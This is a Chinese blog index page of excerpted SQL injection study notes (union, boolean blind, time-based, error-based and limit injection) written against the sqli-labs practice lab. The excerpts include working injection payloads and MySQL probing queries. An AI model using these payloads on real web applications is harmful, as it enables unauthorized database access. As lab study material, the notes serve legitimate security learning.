baiye1 - 博客园

2023年7月27日

摘要： limit注入 limit 注入，这个词是受注入位置划分的。where id=xx 后面的，也可以叫做 where注入。 limit union注入没有order by 的情况 SQL: select * from users where id <= 100 limit 1 union sel 阅读全文

posted @ 2023-07-27 11:21 baiye1 阅读(96) 评论(0) 推荐(0)

3、布尔延时注入

摘要：延时函数 sleep(5); benchmark(50000000,sha1(1)); 获取数据库名长度 and if((length(databse())=8),sleep(5),0)--+ 逐字猜解 and if((substr(databse(),1,1)='s'),sleep(5),0)- 阅读全文

posted @ 2023-07-27 10:58 baiye1 阅读(25) 评论(0) 推荐(0)

2023年7月15日

4、报错注入

摘要： updatexml( ) , concat() mysql> select updatexml(1,concat(0x7e,(select database()),0x7e),1); ERROR 1105 (HY000): XPATH syntax error: '~security~' updat 阅读全文

posted @ 2023-07-15 12:49 baiye1 阅读(63) 评论(0) 推荐(0)

2023年7月13日

2.2、字符串截取函数

摘要： substring() mysql> select substring('abc',1,1); + + | substring('abc',1,1) | + + | a | + + 1 row in set (0.00 sec) mid() mysql> select mid((select dat 阅读全文

posted @ 2023-07-13 17:02 baiye1 阅读(64) 评论(0) 推荐(0)

2.1、字符比较

摘要： strcmp（） strcmp(str1 , str2 ) = return 0; < return -1; > return 1; mysql> select strcmp((substr(database(),1,1)),0x73); + + | strcmp((substr(database( 阅读全文

posted @ 2023-07-13 16:56 baiye1 阅读(31) 评论(0) 推荐(0)

2023年7月12日

2、布尔注入

摘要：获取数据库名长度 ?id=2' and length(database())=8 --+ 逐字猜解 ?id=2' and substr(database(),1,1)='s' --+ ?id=2' and substr(database(),2,1)='e' --+ 获取数据表长度 ?id=2' 阅读全文

posted @ 2023-07-12 13:36 baiye1 阅读(27) 评论(0) 推荐(0)

2023年7月11日

1、union 注入

摘要：其他情况的注入单引号括号?id=-1') union select 1,2,3 --+ 双引号括号?id=-1") union select 1,2,3--+ 判断前面有多少列?id=2' order by 3--+ 确定显示位?id=2' and '1'='2' union select 1 阅读全文

posted @ 2023-07-11 18:45 baiye1 阅读(57) 评论(0) 推荐(0)

sqlilabs + phpstudy8.1

摘要：如果你的PHP study的版本是最新版7.x~下载新版sqli-labs： https://github.com/Rinkish/Sqli_Edited_Version 如果你的PHP study的版本是老版本: https://github.com/Audi-1/sqli-labs 阅读全文

posted @ 2023-07-11 10:21 baiye1 阅读(21) 评论(0) 推荐(0)

白夜12

公告